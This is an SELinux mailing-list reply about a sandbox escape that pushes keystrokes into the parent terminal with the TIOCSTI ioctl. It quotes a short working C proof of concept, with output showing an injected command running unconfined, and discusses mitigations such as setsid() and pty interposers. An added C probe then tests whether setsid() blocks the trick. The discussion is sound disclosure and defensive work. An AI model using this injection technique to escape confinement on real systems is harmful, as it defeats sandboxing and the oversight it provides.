Re: SELinux sandbox escape via TIOCSTI ioctl

On 09/23/2016 09:28 AM, Paul Moore wrote:
> On Fri, Sep 23, 2016 at 5:23 AM,  <up201407890@xxxxxxxxxxxxxxxxxxx> wrote:
>> Hi,
>>
>> When executing a program via the SELinux sandbox, the nonpriv session can
>> escape to the parent session by using the TIOCSTI ioctl to push characters
>> into the terminal's input buffer, allowing an attacker to escape the
>> sandbox.
>>
>> $ cat test.c
>> #include <unistd.h>
>> #include <sys/ioctl.h>
>>
>> int main()
>> {
>>   char *cmd = "id\n";
>>   while(*cmd)
>>    ioctl(0, TIOCSTI, cmd++);
>>   execlp("/bin/id", "id", NULL);
>> }
>>
>> $ gcc test.c -o test
>> $ /bin/sandbox ./test
>> id
>> uid=1000 gid=1000 groups=1000
>> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
>> $ id    <------ did not type this
>> uid=1000(saken) gid=1000(saken) groups=1000(saken)
>> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
> 
> I've only just started looking at this, but it seems like we need a
> call to tcflush()/ioctl(TCFLSH) in the sandbox tool immediately after
> the sandboxed process exits.  Do any of the userspace tools guys have
> any other ideas?

Normally this is handled via setsid() or via a pty interposer.
seunshare does call setsid(), so I believe that sandbox -X or -M are not
susceptible to this, but sandbox without those options does not use
seunshare.  run_init for example uses a pty interposer.  Another
alternative would be to use the ioctl whitelisting support added by
Android to block use of TIOCSTI by the sandbox domains, but it is
unclear if that is sufficient.
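The reason the setsid() route works is visible with a few lines of C. The following is an added example, not code from this thread or from the sandbox/seunshare sources: Linux only lets an unprivileged process use TIOCSTI on its own controlling terminal, so once the injecting process has called setsid() (as seunshare does) the ioctl on the inherited terminal fd is refused with EPERM. A pty pair stands in for the user's real terminal so the probe runs without a login session; it is Linux-specific.

```c
// Added example: why setsid() (as done by seunshare) defeats the TIOCSTI
// trick. An unprivileged process may only push input into its *own*
// controlling tty; after setsid() it has none, so the ioctl fails.
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

// "Type" x\n into a tty the way the PoC does. detach != 0 makes the injecting
// process call setsid() first. Returns 0 if the text reached the tty's input
// queue, the ioctl's errno if it was refused, or -1 if pty setup failed.
static int tiocsti_probe(int detach)
{
    unsigned int num; int unlock = 0, st = 0;
    char path[32], buf[8];
    int master = open("/dev/ptmx", O_RDWR | O_NOCTTY);  // as posix_openpt()
    if (master < 0 || ioctl(master, TIOCGPTN, &num) < 0 ||
        ioctl(master, TIOCSPTLCK, &unlock) < 0)           // as unlockpt()
        return -1;
    snprintf(path, sizeof path, "/dev/pts/%u", num);
    pid_t leader = fork();
    if (leader < 0) return -1;
    if (leader == 0) {
        // New session; opening the slave without O_NOCTTY makes it the
        // controlling tty of this session (the "parent session" in the PoC).
        setsid();
        int tty = open(path, O_RDWR);
        if (tty < 0) _exit(255);
        pid_t child = fork();
        if (child == 0) {
            if (detach) setsid();  // drop the controlling tty, like seunshare
            for (const char *p = "x\n"; *p; p++)
                if (ioctl(tty, TIOCSTI, p) < 0)
                    _exit(errno);
            // Canonical mode: read completes once the injected newline lands.
            ssize_t n = read(tty, buf, sizeof buf);
            _exit(n == 2 && memcmp(buf, "x\n", 2) == 0 ? 0 : 255);
        }
        waitpid(child, &st, 0);
        _exit(WIFEXITED(st) ? WEXITSTATUS(st) : 255);
    }
    waitpid(leader, &st, 0);
    close(master);
    int rc = WIFEXITED(st) ? WEXITSTATUS(st) : 255;
    return rc == 255 ? -1 : rc;
}
```

tiocsti_probe(0) returns 0 (the injected line is read back from the tty) while tiocsti_probe(1) returns EPERM, unless the caller holds CAP_SYS_ADMIN, which bypasses the check. Kernels that disable legacy TIOCSTI entirely (CONFIG_LEGACY_TIOCSTI / dev.tty.legacy_tiocsti) refuse both probes with EIO.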


_______________________________________________
Selinux mailing list
Selinux@xxxxxxxxxxxxx